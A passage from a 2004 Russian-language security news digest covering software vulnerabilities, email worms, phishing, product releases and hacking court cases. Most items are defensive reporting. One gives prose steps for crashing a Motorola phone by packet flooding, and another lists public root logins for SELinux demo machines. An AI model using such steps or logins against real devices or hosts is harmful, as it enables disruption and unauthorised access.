факт распространения новой "моды" в компьютерном андерграунде", - сказал Евгений Касперский. В настоящий момент Антивирус Касперского является единственной системой защиты от вирусов, способной эффективно нейтрализовать вредоносные программы в ZIP-архивах, защищенных паролем. Эта технология добавлена в очередное обновление базы данных программы и доступна для загрузки с серверов "Лаборатории Касперского".
Источник - http://www.kaspersky.ru

2/03/2004 17:15 Обновление сканера ike-scan..
Roy Hills из NTA Monitor Ltd (Рочестер, Англия) объявил об обновлении версии сканера VPN-сетей под названием ike-scan. Собственно, само слово IKE означает Internet Key Exchange - обмен ключами для организации VPN-канала посредством UDP-протокола. Выпущена версия 1.6 этого сканера. Из нововведений - введена декодировка ISAKMP в возсращаемых пакетах. Введены новые ключи (опции) для улучшения читабельности выводимой информации etc. Доступна версия как для nix-ов, так для win32.
Подробности - http://www.nta-monitor.com/ike-scan/

2/03/2004 15:18 Выход NetBSD 1.6.2.
Вышла новая версия операционной системы NetBSD — NetBSD 1.6.2, сообщает www.nixp.ru. Из изменений: большое количество исправлений в безопасности; исправления в производительности; улучшения в существующих драйверах для поддержки некоторых устройств; появились новые драйвера; небольшие исправления в пользовательской среде; значительно улучшена стабильность версии для архитектуры sparc64.
Подробности - http://netbsd.org/Releases/formal-1.6/NetBSD-1.6.2.html

2/03/2004 14:12 Формат mp3 снабдят защитой от копирования.
Компании Thomson и Fraunhofer, владеющие патентами на технологию mp3, объявили о решении создать для нее специальный DRM-штепсель, чтобы избавить mp3 от образа любимой игрушки «пиратов». По информации CNET, обе компании весьма заинтересованы в углублении сотрудничества с такими музыкальными сервисами, как iTunes, принадлежащий компании Apple Computers, и «новым Напстером», так же усердно смывающим пиратское клеймо собственной кровью и лицензионными отчислениями в адрес соответствующих уполномоченных организаций. Интерес Thomson и Fraunhofer состоит в том, что и iTunes, и Napster используют для продажи музыкальных файлов взаимно несовместимые системы управления цифровыми правами (DRM), затрудняющими жизнь не только их покупателям, жестко привязанным к определенным плеерам вроде Apple QuickTime, MS Media Player или изделиям компании RealNetworks, но и самим продавцам. Кроме того, владельцы технологии mp3 не смогут даже заикаться о лицензировании своего кодека Apple или Napster, пока файлы, записанные в этом формате, нельзя будет нормально защитить от несанкционированного копирования. Ожидается, что DRM-система для mp3 будет базироваться в значительной части на открытой архитектуре, разработанной совместными усилиями группы MPEG и Open Mobile Alliance. А сам плагин будет выдаваться бесплатно любой компании, которая приобретет права на использование mp3-кодека.
Источник - http://www.internet.ru

2/03/2004 13:19 Microsoft вовлекает разработчиков в процесс повышения безопасности ПО.
Microsoft готовит обновление своих инструментов программирования, которые выйдут в этом году в тандеме с Windows XP Service Pack 2. Компания планирует выпуск сервисных пакетов к своим инструментам разработки Visual Studio.Net 2003, а также к .Net Framework — структуре runtime, необходимой для исполнения приложений веб-сервисов под Windows. Обновления, направленные на то, чтобы облегчить разработчикам использование новейших средств безопасности, должны выйти примерно в середине года, когда Microsoft планирует выпустить Windows XP Service Pack 2. «Мы хотим максимально приблизить даты выпуска Windows XP Service Pack 2 и инструментальных сервисных пакетов друг к другу. В идеале они должны выйти вместе», — сказал продакт-менеджер Тони Гудхью. Инструментальные сервисные пакеты помогут разработчикам определить, нужно ли вносить изменения в существующие приложения, чтобы они работали с обновленной Windows ХР. Кроме того, они нацелены на поощрение применения разработчиками новых функций защиты. Вместе с обновленными инструментами Microsoft предложит бесплатные курсы и документацию на своем веб-сайте для разработчиков, где описываются следствия тех изменений, которые будут внесены пакетом обновлений Windows XP Service Pack 2. Это первый случай, когда компания предлагает бесплатное обучение по сервисному пакету.
Подробности - http://zdnet.com.com/2100-1104_2-5167106.html

2/03/2004 12:51 Обнаружена дыра в архиваторе WinZip.
Как сообщает "Компьюлента", сотрудники компании iDefense сообщили об обнаружении опасной дыры в одном из самых популярных архиваторов WinZip. Уязвимость теоретически может использоваться для выполнения на удаленной машине произвольного программного кода. При этом брешь присутствует сразу в нескольких модификациях программы - WinZip 7, 8, а также последней бета-версии WinZip 9. Для того чтобы воспользоваться уязвимостью, злоумышленнику достаточно внедрить вредоносный код в сформированный определенным образом архивный файл форматов .mim, .uue, .uu, .b64, .bhx, .hqx или .xxe. Впоследствии данный файл может быть отправлен жертве по электронной почте, через файлообменную сеть или каким-либо иным способом. После того как ничего не подозревающий пользователь попытается просмотреть содержимое архива при помощи WinZip, на его компьютере будет автоматически исполнен внедренный хакерами код. Следует заметить, что обычно WinZip не запускает на выполнение находящиеся в архиве файлы. Именно по этой причине многие пользователи не боятся заглядывать внутрь архивов, присланных из неизвестных источников или загруженных из Всемирной сети. Однако дыра, обнаруженная компанией iDefense, в корне меняет ситуацию. Впрочем, избежать атаки можно путем отключения функции автоматической обработки файлов указанных типов архиваторами WinZip. Кроме того, данная ошибка устранена в финальной версии WinZip 9, а архивы в форматах .mim, .uue, .uu, .b64, .bhx, .hqx и .xxe встречаются достаточно редко.
Подробности - http://www.idefense.com/application/poi/display?id=76&type=vulnerabilities&flashstatus=false

2/03/2004 11:48 Уязвимость в Motorola T720.
Shaun Colley сообщает об обнаружении уязвимостив реализации TCP/IP стека в сотовом телефоне Motorola T720. Этот телефон обладает возможностью выхода в Интернет при помощи встроенного WAP-браузера. Однако, как заметил Шон, при приёме очень большого количества IP-трафика телефон перезагружается. Для демонстрации уязвимости предлагается следующая последовательность действий: соединиться по телефону с Интернетом, зафлудить телефон большим количеством IP-пакетов (путём посылки, например, SYN-пакетов или ICMP_ECHO запросов (ping)), запустить WAP-браузер. После выполнения этой последовательности телефон выключится и потеряет соединение. Также выпущен эксплоит для реализации уязвимости.
Подробности - http://www.securityfocus.com/archive/1/355815/2004-02-28/2004-03-05/0

2/03/2004 11:12 Очередная уязвимость в Internet Explorer.
Специалисты компании iDefense, специализирующейся на вопросах компьютерной безопасности, предупреждают об обнаружении очередной уязвимости в браузере Internet Explorer. Дыра представляет угрозу для пользователей IE версий 5 и 6, работающих под управлением операционных систем Windows 2000 Professional и Windows XP Professional. Как сообщается, проблема связана с ошибкой в системе проверки подлинности доступа при выполнении некоторых рутинных операций. Из-за этой недоработки программный код, ассоциированный с окном ввода информации в одном домене, способен взаимодействовать с окнами ввода данных в других доменах. В результате, злоумышленник получает возможность воровать какие-либо персональные сведения, вводимые пользователями Всемирной сети. Для проведения атаки хакеру достаточно заманить жертву на сформированный определенным образом сайт. Ссылка на такой ресурс может быть отправлена, к примеру, в теле электронного сообщения. Причем название самой ссылки, а также внешний вид вредоносной страницы могут быть позаимствованы у какого-либо заслуживающего доверия сайта. Таким образом, невнимательный пользователь может даже и не обратить внимания на то, что URL несколько отличается от адреса, соответствующего ресурсу, указанному в письме. А это, в свою очередь, может стать причиной утери конфиденциальной информации - банковских счетов, номеров кредитных карт и пр.
Подробности - http://www.idefense.com/application/poi/display?id=77&type=vulnerabilities

2/03/2004 10:43 Обзор вирусной активности от "Лаборатории Касперского".
Опубликован обзор вирусной активности за прошедший месяц от "Лаборатории Касперского". Естественно, самую верхнюю строчку занимает троян Mydoom.а, пик активности которого пришёлся на начало февраля - 68% заражений. На втором месте - Moodown.b - 18,68%, на третьем - опустившийся на одно место вниз Swen - 3,20%. Февраль 2004 года оказался, пожалуй, самым вирусоактивным месяцем за последние несколько лет. Такого количества разнообразных почтовых червей, одновременно циркулирующих в почтовом трафике, еще не было. Прежде всего - лидер января - Mydoom.A, который если и ослабил свои позиции, то весьма незначительно. Несмотря на то, что с 12 февраля червь прекратил свое саморазмножение, количество писем, посланных им до этой даты, а также значительная часть зараженных машин с 'неправильной датой', позволили этому червю удержать за собой первое место в вирусной двадцатке. Необходимо отдельно отметить новичков, которые, очевидно, будут задавать тон в мартовском 'хит-параде'. Их необычно много, сразу шесть, относятся к четырем разным семействам. В первую очередь это I-Worm.Moodown.B (NetSky.B), призванный, по воле автора, удалять с зараженных машин червя Mydoom.a, а заодно противодействовать антивирусным программам. Вторым новичком стал новый вариант червя Mydoom, получивший буквенный идентификатор 'E'. В отличие от своего прародителя, этот вариант удаляет различные документы MS Office. По всей видимости, данная разновидность написана на основе оригинальных исходных текстов Mydoom.A.
Более подробно - http://www.kaspersky.ru

2/03/2004 10:00 Интернет-мошенничество в 2003 году увеличилось в шесть раз.
Миллионы потребителей услуг Интернет-банков подвергаются опасности со стороны постоянно растущего мошенничества, связанного с завладением конфиденциальной информацией о пользователе обманным путем, т.н. «фишинг» (phishing). Полиция предупреждает, что в прошлом году уже три финансовых организации Великобритании потеряли по 20 миллионов фунтов стерлингов из-за действий мошенников такого рода, а общее количество таких компьютерных преступлений увеличилось более чем на 600%. Среди организаций, ставших жертвами мошенников, такие известные банки как Halifax, Barclays, NatWest, Lloyds TSB и HSBC. «Фишинг» заключается в рассылке миллионов электронных писем (так называемая «фишинг-разведка»), после чего «попавшимся» пользователям предлагают зайти на специально созданные мошенниками web-сайты и замаскированные под легальный сайт банка или другой финансовой компании, клиентом которой является жертва. Как правило, такие сайты имеют свое происхождение из Восточной Европы. Пользователю предлагается ввести свое имя, номер кредитной карты, счета, пароли и другую информацию. После этого вся информация попадает в руки мошенников, которые используют ее для перевода денег и осуществления других транзакций в Интернете, с применением легального web-сайта банка. Специалисты советуют, если Вы получаете e-mail с предложением посетить какой-либо web-сайты банка и ввести свое имя и пароль, просто не делайте этого. Ни один настоящий банк никогда не станет просить Вас сделать этого.
Источник - http://www.crime-research.ru/

1/03/2004 18:41 Демонстрация надёжности SELinux.
Russell Coker из Австралии решил продемонстрировать надёжность SELinux, предоставив всем желающим доступ на свою машину по SSH в качестве суперпользователя (root). Цель подобной акции - показать надёжность разработки АНБ США под названием SELinux без ограничения специальных полномочий. Для подключения к машине под управлением Fedora обращаться на адрес cable.coker.com.au, порт - 222, имя пользователя - root, пароль - "fedora". Для доступа к машине под управлением Debian обращаться на адрес cose.coker.com.au как root, пароль - "1q2w3e". Прежде чем подключиться, настоятельно рекомендуем прочитать указания по предварительному конфигурированию собственного файла /etc/ssh/ssh_config, либо использовать ключи ssh-клиента во избежание "недоразумений". ;)) Обсуждение проводится на канале #selinux IRC-сервера irc.freenode.net.
Подробности - http://www.coker.com.au/selinux/play.html

1/03/2004 18:06 Подробное описание уязвимости в mremap(2).
Господа из польской группы iSEC опубликовали подробнейшее описание уязвимости в системном вызове mremap(2) ядра Linux. Можно даже сказать, что они подробно разжёвывают саму природу уязвимости, а также механизм использования уязвимости. В частности на примере получения доступа к read-only файлу /etc/passwd рассматривается пример эксплоита с использованием PTE - page table entries при помощи функции do_munmap(). Также опубликован эксплоит уязвимости. Уязвимость присутствует в ядрах <= 2.2.25, <= 2.4.24, <= 2.6.2. Напомним, что обновлённые версии ядер уже выпущены (чем, собственно, и вызвано вышедшее обновление описания уязвимости).
Подробности - http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt

1/03/2004 17:39 Выход XFree86 4.4.0.
Как сообщает www.nixp.ru, выпущена новая (4.4.0) версия популярной графической подсистемы для UNIX-ОС. Улучшены драйвера для видеокарт (в особенности для nVidia и SiS; добавлен драйвер для некоторых интегрированных графических чипсетов VIA), улучшено автоопределение мыши в Linux и FreeBSD, проведены улучшения в поддержке IPv6, Mesa обновлена до версии 5.0.2 (а 16 января уже вышла ее версия 6.0), также обновления в клиенте библиотеке, работе со шрифтами и i18n, поддержке различных ОС.
Подробности - http://xfree86.org/4.4.0/RELNOTES.html

1/03/2004 17:25 Письма - отдельно, файлы - отдельно.
Сетевая приставка Accellion Attachments 3.5, предлагаемая фирмой Accellion, позволяет освободить серверы электронной почты от работы по пересылке файлов, прикрепленных к сообщениям. Приставка поддерживает почтовые клиенты разработки Microsoft и Lotus - в их интерфейсах взамен стандартной функции добавления прикрепленных файлов появляется клавиша Accellion Attach, при нажатии на которую файл вместо преобразования в MIME и присоединения к сообщению попадает на дисковую подсистему приставки. В само письмо при этом добавляется лишь ссылка на прикрепляемый файл. Имеется функция attachment harvesting, позволяющая перенести на приставку все прикрепленные файлы, имевшиеся на почтовом сервере до ее развертывания в сети. По словам представителей Accellion, приставка увеличивает пропускную способность корпоративного сервера электронной почты и позволяет экономить его дисковое пространство.
Источник - http://www.osp.ru

1/03/2004 17:12 Найдена уязвимость файлового сервиса в Mac OS X.
В пятницу была обнаружена уязвимость в файловом протоколе, который является частью системы Apple Mac OS X 10.3.2, также известной как Panther. Использовав уязвимость, можно было похитить пароль или данные. Протокол позволяет пользователям Macintosh получать доступ к файлам на удалённых ресурсах. Компания Apple обновила протокол передачи файлов (Apple Filing Protocol) возможностью устанавливать защищённые соединения посредством протокола SSH. Тем не менее, Крис Адамс (Chris Adams), системный администратор из Сан-Диего, отметил, что пользователи хоть и могут запрашивать защищённое соединение, система никак не сообщит, что установить SSH-соединение не удалось и создаёт обыкновенное незащищённое.
Источник - http://www.cnews.ru

1/03/2004 16:51 Защита программ с помощью активации станет массовым явлением.
Компания Protection Technology, известная своими решениями по защите программных продуктов на оптических носителях, объявила о выпуске новой технологии защиты и активации ПО StarForce ProActive. Эта технология позволяет разработчикам распространять программные продукты на любом носителе, а также через интернет. При этом они легко смогут контролировать использование приложений и количество проданных лицензий. Суть работы StarForce ProActive заключается в следующем. Разработчик защищает основные исполняемые файлы с помощью серийного номера, используя при этом оболочку защиты StarForce. Пользователь при установке программного продукта вводит прилагаемый серийный номер, а оболочка StarForce генерирует уникальный идентификационный код для конкретного оборудования и операционной среды. Затем серийный номер и идентификационный код пересылаются на сервер защиты StarForce ProActive, после чего пользователь уже получает код активации. Активацию можно произвести и по телефону, по факсу или электронной почте. Каждая активация, в том числе и неудачная, заносится в базу данных, так что разработчики легко смогут следить за использованием своих продуктов.
Источник - http://www.compulenta.ru

1/03/2004 16:08 В обход решения Конгресса спецслужбы организовали тотальную слежку за американцами.
Федеральные агентства безопасности США в обход запрета Конгресса на разработку проекта тотальной слежки за гражданами страны используют уже созданные технологии для тех же целей, сообщается на сайте газеты Washington Times. Речь идет о программе Total Information Awareness (TIA) - грандиозной компьютеризированной системе слежения за гражданами США и иностранцами. Ключевым элементом этой системы являлась технология data-mining (добыча данных). Суперкомпьютер, установленный в Пентагоне, использующий технологию data-mining, должен был создавать своеобразный алгоритм активности террористически опасного индивидуума и, на основе сравнительного анализа, присваивать другим людям некий "индекс террористической опасности". Несмотря на заявление Пентагона о том, что технологии (включая data-mining), разработанные для TIA, не распространялись за пределы соответствующего отдела, спецслужбы, по данным газеты, продолжают работы в этой области, используя менее совершенные системы. Именно технология data-mining и вызвала настолько сильный гнев правозащитников, что Пентагон, ЦРУ, ФБР и прочие антитеррористические ведомства во главе с недавно созданным правительственным Центром объединения данных о террористической угрозе (Terrorist Threat Integration Center (TTIC) перестали использовать даже сам этот термин. Однако, как утверждает газета, несмотря на отказ от терминологии, "добыча данных" (но уже под другими названиями) продолжает осуществляться в других проектах, которые, в отличие от TIA, продолжают работать в рамках кампании по борьбе с терроризмом. Спецслужбы не создают особую базу данных граждан США, но с успехом используют существующие базы авиакомпаний, торговых фирм, банков и полиции.
Подробности - http://lenta.ru/world/2004/03/01/data/

1/03/2004 15:40 Установлена личность взломщика приставки MSN TV.
Агенты Федерального бюро расследований (ФБР) США по обвинению в кибертерроризме арестовали сорокатрехлетнего жителя Луизианы Дэвида Джинсона, cообщает "Компьюлента". Луизианец летом 2002 года разослал владельцам устройства MSN TV, применяющегося для доступа во Всемирную сеть с помощью телевизора, электронные сообщения с вложенными файлами, содержащими вредоносный код. В тексте письма было указано, что вложение якобы представляет собой небольшую утилиту для изменения цветовой гаммы пользовательского интерфейса. Однако, на самом деле запуск файла приводил к изменению настроек приставки MSN TV, которая вместо набора номера интернет-провайдера начинала дозваниваться до службы спасения 911. Причем соединение могло устанавливаться автоматически, когда приставка совершала ежедневный "технический" звонок в полночь. Сообщение, содержащее вредоносный код, было отправлено восемнадцати пользователям службы MSN TV, некоторые из которых по неосторожности перенаправили письмо своим знакомым. Всего, в результате, была инфицирована 21 приставка. Причем в десяти случаях фальшивые звонки стали причиной приезда полиции. Кроме того, вирус отсылал информацию о серийном номере устройств MSN TV по адресу timmy@postmark.net, зарегистрированному на одном из бесплатных серверов, что и позволило отследить злоумышленника. Проанализировав почтовые лог-файлы, агенты безопасности установили, что одна из бета-версий червя была отправлена на собственный аккаунт MSN TV Джинсона.
Подробности - http://www.securityfocus.com/news/8136

1/03/2004 14:46 Недельный отчет о вирусах Panda Software.
Как и положено, сегодня опубликован традиционный еженедельный обзор вирусов компании Panda Software. В отчете подробно рассмотрены четыре червя: Netsky.C, Bizex.A, Nachi.D и Mydoom.F. Учитывая сегодняшнее число скоро следует ожидать ежемесячного отчёта антивирусных компаний.
Отчёт - http://www.viruslab.ru/press/index.php?go=show&num=249

1/03/2004 14:33 Компания F-Secure разослала клиентам вирус и принесла извинения.
Финский производитель антивирусного программного обеспечения F-Secure принес извинения за массовую рассылку почтового червя Netsky.B (Moodown.b) нескольким тысячам своих клиентов в Великобритании, сообщает сайт Vnunet.com. «В силу человеческого фактора вы могли получить электронное письмо, зараженное вирусом Netsky.B. Червь был получен нами через внешний почтовый сервер и оказался в списке рассылки для британских клиентов. Червь вышел не из нашей сети: в список рассылки его направил неизвестный. Если вы уже обновили антивирусные базы, действие Netsky.B в вашей машине уже прекращено», - говорится в тексте официального письменного извинения F-Secure. Руководство F-Secure поспешило заверить пользователей, что подобные ситуации впредь повторяться не будут.
Источник - http://www.viruslist.ru

1/03/2004 13:59 Хакера поблагодарили за проверку сайта разведслужбы "Моссад".
В воскресенье иерусалимским судом был оправдан молодой человек, ранее обвиненный во взломе сайта израильской секретной службы "Моссад". Как сообщается на сайте газеты Haaretz, судья вынес решение о том, что Ави Мизрахи (Avi Mizrahi) пытался не взломать сайт, а проверить его уровень безопасности, а подобные действия достойны только похвалы. Мизрахи подозревали в попытке взлома сайта "Моссад" в начале 2003 года. По словам адвоката обвиняемого, молодой человек оставил свое резюме на сайте разведки, уровень безопасности которого он затем решил проверить с помощью автоматической программы. При этом Мизрахи никогда не раскрывал, какую именно программу он использовал, а также не говорил о результатах проверки и о наличии уязвимостей в системе защиты интернет-сервера, на котором расположен сайт. По мнению привлеченного судом эксперта, Мизрахи показал высокий уровень знаний в области интернет-безопасности. В заключение судья высказался за то, чтобы всячески приветствовать подобные проверки, если они совершены в интересах общества и не наносят ущерба для создателей и содержания сайта.
Подробности - http://www.haaretzdaily.com/hasen/spages/399602.html

1/03/2004 13:24 "Netsky. D": новый охотник на "Mydoom" бороздит пространство интернета.
"Лаборатория Касперского" предупреждает об обнаружении новой вирусной эпидемии, вызванной четвертой модификацией сетевого червя "Netsky" - "Netsky.D" (также известен как "Moodown.D"). На данный момент уже получено несколько десятков сообщений о случаях заражения компьютеров. В этой связи "Лаборатория Касперского" рекомендует пользователям срочно обновить антивирусные программы и ознакомиться с более подробной информацией о данной вредоносной программе. "Netsky.D" распространяется через письма электронной почты. Зараженные сообщения могут иметь самый разный внешний вид: червь случайным образом выбирает заголовок из 25 вариантов, текст письма (6 вариантов), имя вложенного файла (21 вариант). Вложенный файл имеет фиктивное расширение .PIF, в действительности представляя собой обычную EXE-программу (размер около 17Кб). Если пользователь имел неосторожность запустить этот файл, то червь устанавливает себя в систему и запускает процедуры распространения. При установке "Netsky.D" копирует себя с именем WINLOGON.EXE в каталог Windows и регистрирует этот файл в ключе авто-запуска системного реестра. Таким образом он обеспечивает свою активизацию при каждой загрузке операционной системы. Для дальнейшей рассылки червь сканирует файлы наиболее распространенных интернет-приложений (например, WAB, EML, DOC, HTML, MSG и др.), считывает из них адреса электронной почты и незаметно для владельца компьютера отсылает на них свои копии. Важно отметить, что рассылка писем осуществляется в обход установленного на компьютере почтового клиента, но с использованием встроенной SMTP-подпрограммы. С ее помощью "Netsky.D" распространяется через 23 прокси-сервера, расположенных в разных концах мира. Червь имеет ряд побочных действий. В частности, он удаляет из системного реестра ключи другого сетевого червя - "Mydoom", а также пытается нарушить работу Антивируса Касперского.
Подробности - http://www.viruslist.com/viruslist.html?id=144717728)

29/02/2004 21:14 Испания построит суперкомпьютер.
Испания объявила о планах сооружения самого мощного в Европе суперкомпьютера. Испанское правительство сообщает, что эта система послужит сердцем нового центра по медицинским и климатическим исследованиям. Стоимость сооружения нового суперкомпьютера оценивают в 87 млн. долларов, на его постройку уйдет около четырех лет, а память новой машины составит 9 терабайт, что равняется объему памяти 18 тысяч стандартных персональных компьютеров. Как заявил министр науки и технологий Хуан Коста, новая машина поможет бороться с неизлечимыми заболеваниями и засухой, а также поможет достичь новых прорывов в области промышленного дизайна. На основе этого компьютера и в сотудничестве с компанией IBM испанское правительство создаст национальный исследовательский центр. В результате будет создана крупнейшая вычислительная машина в Европе, уступающая только японскому компьютеру под названием Earth Simulator. Строительство будет происходить на северо-востоке Каталонии, в регионе, который традиционно считается самым технологически развитым в Испании.
Источник - http://www.bbc.co.uk

29/02/2004 19:02 Оригинальный подход или XXX-Readme.
Довольно оригинально решили объяснить пользователям популярного сканера nmap основы работы оного господа из HaXXXor. Собственно, на их сайте так и написано, что их цель - "HaXXXor combined computer hacking with porn for the first time on one DVD". На выпущенном им диске "HaXXXor Volume 1: No Longer Floppy" в числе прочего своего рода XXX-Readme по использованию сканера nmap. Некая мадам по имени E-Lita рассказывает о том, где взять исходники сканера, как их откомпилировать, а также об основных режимах и видах сканирования. При этом E-Lita рассказывает всё это, постепенно раздеваясь. Довольно оригинальный подход к компьютерной безопасности (и анти-безопасности, если угодно). Собственно, об этом DVD поведал на своём сайте сам разработчик Phyodor. Желающие могут скачать один из роликов, приведённых на сайте (размеры разные), при этом, естественно, ознакомившись с предупреждением о возрасте (18 лет и т.д.).
Подробности - http://www.insecure.org/nmap/nmap_haxxxor.html

29/02/2004 18:35 Windows Update: свой игрок в чужой команде.
Хакеры – такие же ленивые создания, как и нормальные программисты. Им лень самим искать дыры в Windows, и они просто ждут, пока Microsoft выпустит очередную заплатку и популярно объяснит, как использовать обнаруженную лазейку. Многие хакеры, например, предпочитают брать готовые заплатки и разбирать их по косточкам, чтобы понять, в чем состоит суть обнаруженных ошибок в защите Windows. Во всяком случае, так заявил на открытии Конгресса по электронной преступности (E-Crime Congress) Дэвид Оксмит (David Aucsmith), возглавляющий отделение Microsoft, занимающееся как раз выпуском этих заплаток. По словам Оксмита, которые цитирует BBC, в большинстве случаев разного рода «эксплоиты» появляются не после того, как о найденной дыре в Windows сообщает какой-нибудь «белый хакер», а только через пару дней после появления на сайте Microsoft официальной заплатки. По крайней мере, именно так случилось с «ошибкой ASN1», которая была известна с июля 2003 года. Инструмент, позволяющий использовать эту уязвимость, появился только в феврале 2004 года – через три дня после появления заплатки.
Источник - http://www.internet.ru

29/02/2004 18:08 Уязвимость в FreeBSD.
Группой разработчиков ОС FreeBSD выпущен бюллетень по безопасности FreeBSD-SA-04:03.jail, который описывает наличие уязвимости в этой ОС. Уязвимость обнаружена в механизме ограничения процессов под названием jail. Подобный механизм осуществляется посредством системного вызова jail(2). По сравнению с традиционным подобным механизмом UNIX под названием chroot - обладает более сильной защитой. Однако, в результате ошибки в реализации системного вызова jail_attach(2) существует возможность получения доступа одного процесса jail с привилегиями суперпользователя получить доступ к другому jail-процессу с выходом за пределы собственной корневой (root) директории. Уязвимость присутствует в версиях FreeBSD 5.1-RELEASE, FreeBSD 5.2-RELEASE. Выпущен патч, а также проведены изменения в ветвях RELENG_5_2, 5.2.1-RC2, RELENG_5_1, 5.1-RELEASE-p14. Уязвимость была обнаружена австралийской группой под названием JAS (Jail Aware Scheduling), которая как раз специализируется на изучении безопасности механизма jail в FreeBSD.
Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04:03.jail.asc

29/02/2004 17:43 У абонентов "Стрима" - многочисленные проблемы.
Как сообщает provider.net.ru, компания "МТУ-Интел" (Москва), предоставляющая услуги доступа в Интернет под торговыми марками "Точка.Ру" и "Стрим", проводит работы. Официальное извещение гласит: "Уважаемые абоненты! В связи с планируемыми сервисными работами на серверах компании МТУ-Интел с 09-00 28 февраля по 09-00 1 марта сообщаем Вам о недоступности личного кабинета, активизации Интернет-карт и регистрации каких-либо услуг. В указанный период услуга IP телефонии предоставляться не будет. Планируемые работы не затронут выход в сеть абонентов компании. Приносим свои извинения за причиненные неудобства". Эти работы поставили в затруднительное положение значительное число подписчиков услуги "Стрим", у которых на момент начала проведения работ на личном счету оставалось менее $30. Дело в том, что, согласно условиям договра, списание абонентской платы производится в начале каждого календарного месяца. В связи с проводимыми работами пополнение личные кабинеты пользователей не работают, а пополнение счета невозможно, по крайней мере, до понедельника. В понедельник же, 1 марта, доступ абонентов, не успевших довнести абонентскую плату, будет заблокирован за неуплату. Кроме того, ряд пользователей "Стрима" столкнулся с проблемой непонятного пропадания связи, вероятно, связанного с проводимыми работами. По всей видимости, эта проблема также будет решена не раньше понедельника.
Подробнее - http://forum.ixbt.com/0042/003967-28.html

29/02/2004 17:20 Стандарт "сильной" аутентификации.
Компания VeriSign выдвинула на RSA Conference инициативу Open Authentication Reference Architecture (OATH), в рамках которой предполагается разработать стандартную спецификацию "сильной" аутентификации для Internet-служб взамен применяемых сейчас многочисленных закрытых схем. Сильная аутентификация предусматривает одновременное использование нескольких механизмов регистрации для получения доступа, например смарт-карты или аппаратного ключа совместно с вводом пары имя-пароль. По словам представителя VeriSign, новая архитектура будет на 90% основана на открытых стандартах типа LDAP и RADIUS. В рамках инициативы VeriSign открывает универсальную службу, которой организации смогут пользоваться для аутентификации пользователей через Internet (сейчас такая аутентификация выполняется, как правило, системами, функционирующими в корпоративных сетях). Если OATH получит распространение, в будущем пользователи смогут получать доступ к различным службам (таким, как электронная почта, сайты электронной коммерции, телекоммуникационные системы) при помощи одних и тех же пароля и аутентификационного ключа, встроенного в портативное устройство или смарт-карту. Представители IBM пообещали реализовать поддержку OATH в составе систем управления учетными записями семейства Tivoli.
Источник - http://www.osp.ru

29/02/2004 17:06 4 новых варианта I-Worm.Bagle.
"Лаборатория Касперского" сообщает о появлении четырех новых вариантов почтового червя Bagle, обнаруженных 28-29 февраля 2004 года. Получившие обозначения c, d, e и f варианты в настоящее время равнозначно присутствуют в почтовом трафике. Варианты имеют незначительные отличия друг от друга и упакованы разными утилитами (UPX, Pex). Все они обладают backdoor-функцией, открывающей на зараженной машине порт TCP 2745 для приема команд. Процедуры детектирования и удаления новых вариантов I-Worm.Bagle уже добавлены в обновления баз "Антивируса Касперского". Подробная информация об I-Worm.Bagle.c и I-Worm.Bagle.d доступна в "Вирусной Энциклопедии". Описания вариантов e и f будут доступны позднее. Подробные описания доступны по приведённым ниже ссылкам.
I-Worm.Bagle.c - http://www.viruslist.ru/viruslist.html?id=144704488
I-Worm.Bagle.d - http://www.viruslist.ru/viruslist.html?id=144704778

29/02/2004 16:31 Открылась новая версия Фундаментальной электронной библиотеки.
В Сети открылась новая, вторая версия Фундаментальной электронной библиотеки (ФЭБ), сообщает lenta.ru. По сравнению с первой версией в нее были внесены следующие изменения:
1. Изменен дизайн, доработано программное обеспечение.
2. Открыта англоязычная версия ФЭБ.
3. Добавлены ЭНИ (электронные научные издания) "Литературная энциклопедия", (М., 1929-1939. Т. 1-9, 11), - ценнoe собрание справочной информации, никогда не переиздававшееся и давно ставшее библиографической редкостью.
4. Добавлены ЭНИ - выпуски филологической серии "Известий АН", за 1861-1903 годы (в виде PDF-файлов). В перспективе в это ЭНИ будут добавлены все выпуски филологической серии "Известий АН" - официального печатного органа лингвистического и литературоведческого отделения (секции) Академии наук с 1852 года по настоящее время.
Сайт библиотеки - http://www.feb-web.ru/

28/02/2004 16:06 Из России в Россию через Америку с любовью.
Более половины нежелательных коммерческих рассылок приходят из США. Не без помощи России. Об этом свидетельствует глобальное исследование защитников электронных ящиков из компании Sophos. Проанализировав весь спам, пришедший за два дня на прошлой неделе, сотрудники Sophos представили «чертову дюжину» наиболее злостных нарушителей. Хит-лист возглавляют США, которые несут ответственность за 56,74% нежелательных электронных сообщений. Второе место у Канады – 6,8 %. Бронзой могут похвастаться китайцы (6,24%). Далее следуют Южная Корея, Нидерланды, Бразилия, Германия, Франция, Великобритания, Австралия, Мексика и Испания. Однако, ситуация не так проста, как кажется на первый взгляд. По данным, Sophos, распространение спама из Америки происходит с инфицированных компьютеров неосведомленных пользователей. А истинная генерация нежелательных рассылок происходит в России. В докладе утверждается, что Российская Федерация является чрезвычайно опасным нарушителем. Русские хакеры взламывают компьютеры в разных странах, а затем через них отправляют спам по всему миру. С больных машин распространяется более 30% нежелательных коммерческих рассылок.
Источник - http://www.runetr.ru

28/02/2004 15:41 Диал-ап уходит в историю.
Количество широкополосных подключений к интернету по кабелю, оптоволокну и через DSL наконец-то превысило количество подключений по телефонным линиям. Диал-ап окончательно и бесповоротно уходит в историю. Исследование компании Ipsos Insight показало, что коммуникационная революция свершается на наших глазах. Во-первых, в 2003 году количество высокоскоростных подключений составило 50% всех подключений к интернету и превысило популярность диал-апа. Во-вторых, зарегистрирован беспрецедентный рост на 145% количества беспроводных подключений: с этой технологией теперь знакомы уже 17% интернетчиков в мире, хотя лишь 4% используют ее в качестве основного способа подключения к Сети. Впрочем, соединения по телефонным линиям по-прежнему пользуются популярностью: 39% опрошенных пользователей назвали коммутированный доступ основной технологией, с помощью которой они выходят в интернет. В то же время различными технологиями широкополосного доступа постоянно пользуются 50% интернетчиков (31% — DSL, 15% — кабельный модем, 4% — оптоволокно). В некоторых странах, например, в России, медленный диал-ап по-прежнему активно используется для работы в интернете, но он все хуже и хуже с этим справляется по мере того как в Сети растет популярность мультимедиа-приложений.
Более подробно - http://www.webplanet.ru/news/internet/2004/2/27/dial-up.html

28/02/2004 15:07 Уязвимость в cryptoloop.
